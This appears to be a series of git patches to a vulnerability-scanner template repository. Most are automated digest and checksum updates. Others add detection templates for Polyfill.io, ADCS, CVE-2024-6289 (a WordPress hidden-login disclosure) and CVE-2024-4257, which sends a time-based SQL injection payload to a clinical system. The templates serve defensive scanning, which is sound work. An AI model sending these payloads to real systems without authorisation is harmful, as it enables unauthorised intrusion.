http/exposures/configs/apache-ozone-conf.yaml | 1 + http/technologies/apache/apache-ozone-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposures/configs/apache-ozone-conf.yaml b/http/exposures/configs/apache-ozone-conf.yaml index 1a0b836adf..8d14ec3f5b 100644 --- a/http/exposures/configs/apache-ozone-conf.yaml +++ b/http/exposures/configs/apache-ozone-conf.yaml @@ -37,3 +37,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100e0aab20fe9079676fe1b51de2881fde4c85afb9eff230594c734cc2fe9289f25022100efd1afa9a5fa2c2185f9678274dbcf357bf2e7a82c58fef68c6ca4fba5177ff3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-ozone-detect.yaml b/http/technologies/apache/apache-ozone-detect.yaml index 07b6657aea..ccc40bf7b0 100644 --- a/http/technologies/apache/apache-ozone-detect.yaml +++ b/http/technologies/apache/apache-ozone-detect.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100a6fe873ee57b8f63b334e49cd72d7436f67ad4810e45bde91a46d62aabe83f6302203f1b7a1cec48d89ac746c7ca36e19dac04886d6b022eebdc64d4848455bb89ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 27c8b39934c623386e231e2f53d91f6472d0ec29 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 12:38:46 +0000 Subject: [PATCH 1269/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index cf759d5638..ff6f26f13c 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' + - 'http/exposed-panels/falcosidekick-panel.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' From 9a675a2e9c6ad2d2090aa3e1679f5149e93dacba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 13:15:01 +0000 Subject: [PATCH 1271/1841] Auto Generated Templates Checksum [Mon Jul 15 13:15:01 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 84e5f55ef3..2231f4fa9d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2850,7 +2850,7 @@ http/cves/2022/CVE-2022-35416.yaml:ba270b48da401279206d5f902bbe73ca36541510 http/cves/2022/CVE-2022-35493.yaml:1a510b745d56a950c268cf2e0c6a7641e8567b88 http/cves/2022/CVE-2022-35653.yaml:471e71af52b2016a93691b1d0dac298788f1d6d8 http/cves/2022/CVE-2022-3578.yaml:cf4906cde10fe488bbdf473de15bb5d018745939 -http/cves/2022/CVE-2022-35914.yaml:cb20ef72dc328bf515f5049968cc334103451d7e +http/cves/2022/CVE-2022-35914.yaml:3d2c3f760cf05873f8660ca11b5d02c224b939c1 http/cves/2022/CVE-2022-36446.yaml:353c3190a3f8d375c693051d20fc2160e9aaa9a9 http/cves/2022/CVE-2022-36537.yaml:80c128feeca028db35b08e0548acc4895ccd2814 http/cves/2022/CVE-2022-36553.yaml:869cc6bd636251787da80b5eaef2cb69f0934607 @@ -4847,7 +4847,7 @@ http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4 http/exposures/configs/amazon-docker-config.yaml:1d8f327855f92a3e31436e4ba787bf72c1593362 http/exposures/configs/ansible-config-disclosure.yaml:49727934f2ea10682033bb7b7d2886c8120e599c http/exposures/configs/apache-config.yaml:f44a3a1e85855c7d7e0a98987e169b4d8c9953de -http/exposures/configs/apache-ozone-conf.yaml:93a18844e6db3976029026e9eba28b8735b8da0d +http/exposures/configs/apache-ozone-conf.yaml:d4268ae66e2ca96c4bf2e0b0738128f0c7673e1b http/exposures/configs/apache-pinot-config.yaml:5e48b64394394c62759e9a054ed422c5a891c50a http/exposures/configs/appspec-yml-disclosure.yaml:6bc7aaae85de1d64d2ad28ca4474205b6cba4a1a http/exposures/configs/appveyor-configuration-file.yaml:20b64eb403f080bf2a11eaf98f3010f97a7ddd39 @@ -6900,7 +6900,7 @@ http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa24 http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a http/technologies/apache/apache-guacamole.yaml:8c7975c569769ee074f51307e0d963b816e631aa http/technologies/apache/apache-karaf-panel.yaml:50fa0b20105a0786c5ce5ddce7aa5c49237bfafa -http/technologies/apache/apache-ozone-detect.yaml:2bae35e190d1e6e7c6ae74b4b4e3f247bb08e562 +http/technologies/apache/apache-ozone-detect.yaml:a06d145bb51dd1d87c14bc151843fdf8c5ef7285 http/technologies/apache/apache-pinot-detect.yaml:d87ea1adf8a744e4bea49ca48778d43572019d8d http/technologies/apache/apache-tapestry-detect.yaml:e909341eeb3f54c209d395e2d5277b754985d70c http/technologies/apache/apache-zeppelin-detect.yaml:2be8f1552e97541d05b1a9ed6d9fda8b2d9df37d @@ -8882,7 +8882,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fc90fb832b47142377c43a1e88ce4aeb61f64497 +templates-checksum.txt:c138e1dec2e8d0ab849320b8788d5c614d9c8fea wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0a457c6b26ab072b0a755a8f4a0a408836de1eaf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 13:16:41 +0000 Subject: [PATCH 1272/1841] Auto Template Signing [Mon Jul 15 13:16:41 UTC 2024] :robot: --- http/cves/2022/CVE-2022-35914.yaml | 2 +- http/exposed-panels/falcosidekick-panel.yaml | 3 ++- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index 9fc868d35b..698c9ff15a 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -80,4 +80,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022031f4721d255682854c1f6e4bd4388e92d46d517fab31f98380587eb1a48affb80220778ad6d9444db683bd4d83ff14f1b4c8bdd98b8a158995518fb94c3fe5cc4a19:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022071715e230c583dcc77ca7b19e5fe7b16b827b336f1ff76ac3a7e67766d9a3cea022100e481d4bbf96495298f9fe22ab286175a30b4846146983dd92c95e4a51916d702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/falcosidekick-panel.yaml b/http/exposed-panels/falcosidekick-panel.yaml index a0115c36a4..6daeead72e 100644 --- a/http/exposed-panels/falcosidekick-panel.yaml +++ b/http/exposed-panels/falcosidekick-panel.yaml @@ -23,4 +23,5 @@ http: dsl: - 'status_code == 200' - 'contains_any(to_lower(body), "falcosidekick ui", "falcosidekick-ui")' - condition: and \ No newline at end of file + condition: and +# digest: 4a0a00473045022100af97afecd9beaaa9c8b9b94b03bbfe590b0f81e728159ee1cdcdc4de34407b3302201dce0e4b75ceadf27a96601a8810c53b19e22f75c76a4ea23bd962cbc3c6e204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e58e3da32870e597e15f327bad8c4f03ca410e12 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 18:48:30 +0530 Subject: [PATCH 1273/1841] minor update --- http/vulnerabilities/backdoor/polyfill-backdoor.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml index e65efaee93..e0879d9420 100644 --- a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml +++ b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml @@ -1,7 +1,7 @@ id: polyfill-backdoor info: - name: Polyfill.io - Detection + name: Polyfill.io - Backdoor author: kazet severity: high description: | @@ -30,4 +30,4 @@ http: part: body regex: - "]* src=['\"]https?://([a-zA-Z0-9-]*.)?polyfill.io[/'\"]" -# digest: 4a0a0047304502202741c6e8841c555d7c41536c7eccafe5207519fdbe69a21a76d09728e190bc5d022100ac5f13bcb311fa2091c545e60acfa5a45f6b000cdf5e4fd5a46f76d0632f4575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202741c6e8841c555d7c41536c7eccafe5207519fdbe69a21a76d09728e190bc5d022100ac5f13bcb311fa2091c545e60acfa5a45f6b000cdf5e4fd5a46f76d0632f4575:922c64590222798bb761d5b6d8e72950 From 647732cbdffcff3ec5abc3d759edd70bf7b95250 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 15:09:28 +0000 Subject: [PATCH 1275/1841] Auto Generated Templates Checksum [Mon Jul 15 15:09:28 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2231f4fa9d..9619570a41 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2850,7 +2850,7 @@ http/cves/2022/CVE-2022-35416.yaml:ba270b48da401279206d5f902bbe73ca36541510 http/cves/2022/CVE-2022-35493.yaml:1a510b745d56a950c268cf2e0c6a7641e8567b88 http/cves/2022/CVE-2022-35653.yaml:471e71af52b2016a93691b1d0dac298788f1d6d8 http/cves/2022/CVE-2022-3578.yaml:cf4906cde10fe488bbdf473de15bb5d018745939 -http/cves/2022/CVE-2022-35914.yaml:3d2c3f760cf05873f8660ca11b5d02c224b939c1 +http/cves/2022/CVE-2022-35914.yaml:e6f5016c74cfafc6587ded1139797561a97d8d4f http/cves/2022/CVE-2022-36446.yaml:353c3190a3f8d375c693051d20fc2160e9aaa9a9 http/cves/2022/CVE-2022-36537.yaml:80c128feeca028db35b08e0548acc4895ccd2814 http/cves/2022/CVE-2022-36553.yaml:869cc6bd636251787da80b5eaef2cb69f0934607 @@ -4023,7 +4023,7 @@ http/exposed-panels/extron-cms-panel.yaml:adbdc23be4107dc614acb0ef6ea20aba3796be http/exposed-panels/ez-publish-panel.yaml:5dc8fa80dca1479e568d4b1cf87563755471e0a0 http/exposed-panels/f-secure-policy-manager.yaml:e759ce79b7869284f9cddab81bfa0da26d08099b http/exposed-panels/f5-admin-interface.yaml:06ce0e9fbf3ed64d2e550abccd8fa1ba7cea60a4 -http/exposed-panels/falcosidekick-panel.yaml:0bd17de7df4e475e056b9df0d7a209cffe9ca240 +http/exposed-panels/falcosidekick-panel.yaml:cefd542269e92b8ee42dffece2d74a668f63ead8 http/exposed-panels/faraday-login.yaml:c3b48df43eb116d0c1e264a181ca095685ef0e0b http/exposed-panels/fastapi-docs.yaml:74f9efd92e158f5b36c17eb1e45668c5fb0dafee http/exposed-panels/fastpanel-hosting-control-panel.yaml:302d3b1d9cb607ffebc9746556ba3af14fb57e0e @@ -7795,7 +7795,7 @@ http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7 http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 -http/vulnerabilities/backdoor/polyfill-backdoor.yaml:ef5b84434c7d83f9cc3e197c42f1c51b191faf8f +http/vulnerabilities/backdoor/polyfill-backdoor.yaml:12ec4ad8b5b872056c773edf10c4e167977b7f6b http/vulnerabilities/bsphp-info.yaml:46e581c10e555d13d42b306e5ba11288df471949 http/vulnerabilities/chanjet-tplus/chanjet-tplus-rce.yaml:47bcfad01469360b596efc0ee445ea1da8b7ae9e http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passreset.yaml:76ea49402465f15c655f2e5c13c29f6eb50e8849 @@ -8882,7 +8882,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c138e1dec2e8d0ab849320b8788d5c614d9c8fea +templates-checksum.txt:9923fa649026efc80e5922e143d578e3bbea683f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 954c8665e15cfc484f6ebe582ab5a7842ad90a2d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 15:11:10 +0000 Subject: [PATCH 1276/1841] Auto Template Signing [Mon Jul 15 15:11:10 UTC 2024] :robot: --- http/vulnerabilities/backdoor/polyfill-backdoor.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml index e0879d9420..d0c127ca2c 100644 --- a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml +++ b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml @@ -30,4 +30,4 @@ http: part: body regex: - "]* src=['\"]https?://([a-zA-Z0-9-]*.)?polyfill.io[/'\"]" -# digest: 4a0a0047304502202741c6e8841c555d7c41536c7eccafe5207519fdbe69a21a76d09728e190bc5d022100ac5f13bcb311fa2091c545e60acfa5a45f6b000cdf5e4fd5a46f76d0632f4575:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203f42ee7cd83f09782d81dcd502e2ed01add4d201cceb9baf65a2a240203f8046022100a05c40d55db5434ccc8fb01d0df8479216dc0191ebf471f93bcfb3d7adff0309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9096114553548d43fbed8635f6c8731c27076fbc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Mon, 15 Jul 2024 17:26:27 +0200 Subject: [PATCH 1277/1841] DS_Store template had FPs on UTF-16 encoded HTML files --- http/exposures/files/ds-store-file.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/exposures/files/ds-store-file.yaml b/http/exposures/files/ds-store-file.yaml index 68cf8d982d..30f4c19230 100644 --- a/http/exposures/files/ds-store-file.yaml +++ b/http/exposures/files/ds-store-file.yaml @@ -24,6 +24,12 @@ http: - "contains(hex_encode(body), '0000000142756431')" condition: or + - type: dsl + negative: true + dsl: + - "contains(to_lower(body), '\0<\0h\0t\0m\0l')" + - "contains(to_lower(body), '\0<\0b\0o\0d\0y')" + - type: dsl dsl: - 'status_code == 200' @@ -33,4 +39,3 @@ http: - 'contains(to_lower(header), "accept-ranges: bytes")' - 'contains(to_lower(header), "octet-stream")' condition: or -# digest: 4b0a00483046022100e615e464074ec8d07c0be8de940efbc09b919955cfae6ace638e5954e87044d1022100daaaef38756c1b860b23164372ab226483f028f9403b0ea61a6a29d53d0035cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8c3bf3a1dd6af827c9827e002ba40726f5008965 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 15 Jul 2024 21:21:00 +0300 Subject: [PATCH 1278/1841] add cve-2024-4257 --- http/cves/2024/CVE-2024-4257.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4257.yaml diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml new file mode 100644 index 0000000000..3a2d864af7 --- /dev/null +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-4257 + +info: + name: BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection + author: securityforeveryone + severity: medium + description: | + A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-4257 + - https://github.com/GAO-UNO/cve/blob/main/sql.md + - https://vuldb.com/?submit.321338 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-4257 + cwe-id: CWE-89 + epss-score: 0.00045 + epss-percentile: 0.15929 + metadata: + verified: true + max-request: 1 + vendor: BlueNet Technology + product: Clinical Browsing System + fofa-query: app="LANWON-临床浏览系统" + tags: cve,cve2024,sqli,blunet + +http: + - raw: + - | + @timeout 20s + GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(header,"text/html")' + - 'status_code == 200' + condition: and From 4b77efe4b8629265159e52f95cc483f6f10b19e4 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 15 Jul 2024 21:23:47 +0300 Subject: [PATCH 1279/1841] add CVE-2024-6289 --- http/cves/2024/CVE-2024-6289.yaml | 46 +++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6289.yaml diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml new file mode 100644 index 0000000000..ba918d7caf --- /dev/null +++ b/http/cves/2024/CVE-2024-6289.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-6289 + +info: + name: WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure + author: securityforeveryone + severity: medium + description: | + The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page. + reference: + - https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-6289 + - https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/ + classification: + epss-score: 0.00043 + epss-percentile: 0.09266 + metadata: + verified: true + max-request: 1 + vendor: wpserveur + product: wps_hide_login + framework: wordpress + publicwww-query: "/wp-content/plugins/wps-hide-login/" + tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress + +http: + - raw: + - | + GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1 + Host: {{Hostname}} + + - | + GET /?gf_page=randomstring HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_1,"WPS Hide Login") && status_code_1 == 200' + - '!contains(tolower(location_2), "wp-login.php")' + - 'contains(header_2,"%2F%3Fgf_page%3Drandomstring&reauth=1")' + condition: and + + extractors: + - type: kval + kval: + - location From 855a34aa73cdc06fc4544882c9c92829dc12dee0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 16 Jul 2024 00:06:18 +0530 Subject: [PATCH 1280/1841] Update and rename adcs-detect.yaml to http/exposures/files/adcs-detect.yaml --- adcs-detect.yaml | 28 --------------------------- http/exposures/files/adcs-detect.yaml | 27 ++++++++++++++++++++++++++ 2 files changed, 27 insertions(+), 28 deletions(-) delete mode 100644 adcs-detect.yaml create mode 100644 http/exposures/files/adcs-detect.yaml diff --git a/adcs-detect.yaml b/adcs-detect.yaml deleted file mode 100644 index c23078450b..0000000000 --- a/adcs-detect.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: adcs-detect - -info: - name: ADCS - Detect - author: pastaga,defte - severity: info - description: | - ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` - tags: ad,adcs - -http: - - method: GET - path: - - "{{BaseURL}}/certenroll" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "Location: {{BaseURL}}/certenroll/" - - - type: status - status: - - 300 - - 301 - - 302 - condition: or diff --git a/http/exposures/files/adcs-detect.yaml b/http/exposures/files/adcs-detect.yaml new file mode 100644 index 0000000000..6bf0001b6c --- /dev/null +++ b/http/exposures/files/adcs-detect.yaml @@ -0,0 +1,27 @@ +id: adcs-detect + +info: + name: Certification Authority Web Enrollment (ADCS) - Detection + author: pastaga,defte + severity: info + description: | + Web Enrollment is a service that can be installed on an AD CS server to allow users and computers in an Active Directory domain to request a certificate through an interactive web page. + metadata: + verified: true + shodan-query: html:"/certenroll" + tags: ad,adcs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/certenroll/" + - "{{BaseURL}}/CertEnroll/" + + host-redirects: true + matchers: + - type: dsl + dsl: + - contains(body, ".crl") || contains(body, ".crt") + - contains(body, "CertEnroll") || contains(body, "certenroll") + - status_code == 200 + condition: and From 52e54e601083f26ed072842b9d4f9757ec73dde1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 01:04:59 +0530 Subject: [PATCH 1281/1841] minor update --- http/cves/2024/CVE-2024-4257.yaml | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml index 3a2d864af7..403b4f0e95 100644 --- a/http/cves/2024/CVE-2024-4257.yaml +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -20,19 +20,32 @@ info: metadata: verified: true max-request: 1 - vendor: BlueNet Technology - product: Clinical Browsing System fofa-query: app="LANWON-临床浏览系统" tags: cve,cve2024,sqli,blunet +flow: http(1) && http(2) + http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"临床浏览")' + - 'contains(header,"text/html")' + - 'status_code == 200' + condition: and + internal: true + - raw: - | @timeout 20s GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: dsl dsl: From 8c3d4cdf80a5e4c5ab4bd76acef096a9682acdfe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 01:13:56 +0530 Subject: [PATCH 1282/1841] minor update --- http/cves/2024/CVE-2024-6289.yaml | 24 +++++++++++++++++++----- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml index ba918d7caf..fb0df7815e 100644 --- a/http/cves/2024/CVE-2024-6289.yaml +++ b/http/cves/2024/CVE-2024-6289.yaml @@ -6,6 +6,7 @@ info: severity: medium description: | The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page. + remediation: Fixed in 1.9.16.4 reference: - https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/ - https://nvd.nist.gov/vuln/detail/CVE-2024-6289 @@ -20,7 +21,12 @@ info: product: wps_hide_login framework: wordpress publicwww-query: "/wp-content/plugins/wps-hide-login/" - tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress + tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress,wps-hide-login + +flow: http(1) && http(2) + +variables: + string: "{{rand_text_alpha(10)}}" http: - raw: @@ -28,16 +34,24 @@ http: GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - 'contains(body,"WPS Hide Login")' + - 'status_code == 200' + condition: and + internal: true + + - raw: - | - GET /?gf_page=randomstring HTTP/1.1 + GET /?gf_page={{string}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - 'contains(body_1,"WPS Hide Login") && status_code_1 == 200' - - '!contains(tolower(location_2), "wp-login.php")' - - 'contains(header_2,"%2F%3Fgf_page%3Drandomstring&reauth=1")' + - '!contains(tolower(location), "wp-login.php")' + - 'contains(header,"%2F%3Fgf_page%3D{{string}}&reauth=1")' condition: and extractors: From 8d0cbc0584f2395bee64574852cad3f66654ce90 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 00:19:56 +0000 Subject: [PATCH 1283/1841] Auto WordPress Plugins Update [Tue Jul 16 00:19:56 UTC 2024] :robot: --- helpers/wordpress/plugins/amp.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- .../plugins/woo-checkout-field-editor-pro.txt | 2 +- .../wordpress/plugins/ad-inserter.yaml | 1 - .../wordpress/plugins/add-to-any.yaml | 1 - .../wordpress/plugins/admin-menu-editor.yaml | 1 - .../plugins/advanced-custom-fields.yaml | 1 - .../wordpress/plugins/akismet.yaml | 1 - .../plugins/all-in-one-seo-pack.yaml | 1 - .../plugins/all-in-one-wp-migration.yaml | 1 - .../all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - .../wordpress/plugins/antispam-bee.yaml | 1 - .../wordpress/plugins/astra-sites.yaml | 1 - .../wordpress/plugins/autoptimize.yaml | 1 - .../wordpress/plugins/backwpup.yaml | 1 - .../plugins/better-search-replace.yaml | 1 - .../wordpress/plugins/better-wp-security.yaml | 1 - .../plugins/black-studio-tinymce-widget.yaml | 1 - .../wordpress/plugins/breadcrumb-navxt.yaml | 1 - .../wordpress/plugins/breeze.yaml | 1 - .../plugins/broken-link-checker.yaml | 1 - .../technologies/wordpress/plugins/chaty.yaml | 1 - .../plugins/child-theme-configurator.yaml | 1 - .../wordpress/plugins/classic-editor.yaml | 1 - .../wordpress/plugins/classic-widgets.yaml | 1 - .../plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - .../wordpress/plugins/coblocks.yaml | 1 - .../wordpress/plugins/code-snippets.yaml | 1 - .../wordpress/plugins/coming-soon.yaml | 1 - .../wordpress/plugins/complianz-gdpr.yaml | 1 - .../plugins/contact-form-7-honeypot.yaml | 1 - .../wordpress/plugins/contact-form-7.yaml | 1 - .../wordpress/plugins/contact-form-cfdb7.yaml | 1 - .../wordpress/plugins/cookie-law-info.yaml | 1 - .../wordpress/plugins/cookie-notice.yaml | 1 - .../wordpress/plugins/copy-delete-posts.yaml | 1 - .../wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../creative-mail-by-constant-contact.yaml | 1 - .../wordpress/plugins/custom-css-js.yaml | 1 - .../wordpress/plugins/custom-fonts.yaml | 1 - .../plugins/custom-post-type-ui.yaml | 1 - .../wordpress/plugins/disable-comments.yaml | 1 - .../wordpress/plugins/disable-gutenberg.yaml | 1 - .../wordpress/plugins/duplicate-page.yaml | 1 - .../wordpress/plugins/duplicate-post.yaml | 1 - .../wordpress/plugins/duplicator.yaml | 1 - .../duracelltomi-google-tag-manager.yaml | 1 - .../plugins/easy-table-of-contents.yaml | 1 - .../wordpress/plugins/easy-wp-smtp.yaml | 1 - .../wordpress/plugins/elementor.yaml | 1 - .../wordpress/plugins/elementskit-lite.yaml | 1 - .../plugins/enable-media-replace.yaml | 1 - .../wordpress/plugins/envato-elements.yaml | 1 - .../essential-addons-for-elementor-lite.yaml | 1 - .../plugins/ewww-image-optimizer.yaml | 1 - .../plugins/facebook-for-woocommerce.yaml | 1 - .../wordpress/plugins/fast-indexing-api.yaml | 1 - .../favicon-by-realfavicongenerator.yaml | 1 - .../wordpress/plugins/flamingo.yaml | 1 - .../wordpress/plugins/fluentform.yaml | 1 - .../wordpress/plugins/font-awesome.yaml | 1 - .../plugins/force-regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/formidable.yaml | 1 - .../wordpress/plugins/forminator.yaml | 1 - .../plugins/ga-google-analytics.yaml | 1 - .../plugins/gdpr-cookie-compliance.yaml | 1 - .../google-analytics-dashboard-for-wp.yaml | 1 - .../google-analytics-for-wordpress.yaml | 1 - .../plugins/google-listings-and-ads.yaml | 1 - .../wordpress/plugins/google-site-kit.yaml | 1 - .../plugins/google-sitemap-generator.yaml | 1 - .../wordpress/plugins/gtranslate.yaml | 1 - .../wordpress/plugins/gutenberg.yaml | 1 - .../plugins/happy-elementor-addons.yaml | 1 - .../plugins/header-footer-code-manager.yaml | 1 - .../plugins/header-footer-elementor.yaml | 1 - .../wordpress/plugins/header-footer.yaml | 1 - 